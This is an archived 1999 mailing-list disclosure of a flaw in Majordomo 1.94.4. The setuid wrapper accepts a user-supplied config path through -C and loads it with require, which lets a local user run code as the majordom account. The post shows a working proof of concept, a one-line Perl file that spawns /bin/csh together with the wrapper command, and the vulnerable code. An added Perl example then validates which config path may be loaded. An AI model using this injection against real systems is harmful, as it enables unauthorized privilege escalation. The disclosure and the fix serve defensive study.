$cf Security flaw
Subject: $cf Security flaw
From: Shevek (shevek@anarres.org)
Date: Thu Dec 02 1999 - 16:00:48 CST
I can get majordomo privileges as a user.
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
root@tirin /usr/local/majordomo# ls -ld .
drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./
root@tirin /usr/local/majordomo# ls -l wrapper
-rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper*
The lines in Majordomo (I found the bug by simple inspection, it's also in
resend)
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
while ($ARGV[0]) { # parse for config file or default list
    if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case
        $cf = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } elsif ($ARGV[0] eq "-l") {
        $deflist = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } else {
        die "Unknown argument $ARGV[0]\n";
    }
}
if (! -r $cf) {
die("$cf not readable; stopped");
}
require "$cf";
Am I doing something wrong, or is this a general flaw? Can I simply
disable all the possible methods of setting $cf without breaking other
things? I haven't had time to inspect the system at any length, I just
glanced at it.
I am not on any greatcircle mailing lists, I would appreciate replies to
my own address if there is discussion on this subject.
Majordomo version 1.94.4
Perl 5.005_03
Ta.
S.
-- Shevek GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y? Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
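One way to restrict which file `$cf` may name before `require` executes it, as an added example that is not part of the original message and is not Majordomo's own fix. The helper name `cf_is_trusted`, the temporary directories and the file names are assumptions made for the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Temp qw(tempdir);

# True only if $cf is safe to pass to require(): after symlinks are resolved
# it must be a regular file under $trusted_dir, owned by a trusted uid, and
# not writable by group or others.
sub cf_is_trusted {
    my ($cf, $trusted_dir, @trusted_uids) = @_;
    my $real = abs_path($cf);
    my $base = abs_path($trusted_dir);
    return 0 unless defined $real && defined $base;
    return 0 unless index($real, "$base/") == 0;    # outside the trusted dir
    my @st = stat($real) or return 0;               # missing or unreadable
    return 0 unless -f _;                           # not a regular file
    return 0 unless grep { $st[4] == $_ } @trusted_uids;
    return 0 if $st[2] & 022;                       # group/other writable
    return 1;
}

# Constructed demo: temp directories stand in for /etc and a user's home, and
# the current uid ($<) stands in for the trusted owner.
my $etc  = tempdir(CLEANUP => 1);
my $home = tempdir(CLEANUP => 1);

sub make_file {
    my ($path, $mode) = @_;
    open(my $fh, '>', $path) or die "$path: $!";
    print $fh "1;\n";
    close $fh;
    chmod $mode, $path or die "chmod $path: $!";
    return $path;
}

my $good  = make_file("$etc/majordomo.cf", 0644);    # owner-only writable config
my $loose = make_file("$etc/loose.cf",     0666);    # group/other writable
my $user  = make_file("$home/foo.pl",      0644);    # lives outside the trusted dir
symlink($user, "$etc/link.cf") or die "symlink: $!"; # symlink resolving outside it

for my $cf ($good, $loose, $user, "$etc/link.cf", "$etc/missing.cf") {
    printf "%-6s %s\n", (cf_is_trusted($cf, $etc, $<) ? "accept" : "REJECT"), $cf;
}
```

The check only holds if the trusted directory itself is writable solely by the trusted owner; otherwise the file can be replaced between the check and the `require`. The same test applies to a path taken from `MAJORDOMO_CF` as to one taken from `-C`.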
This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 21:20:08 CST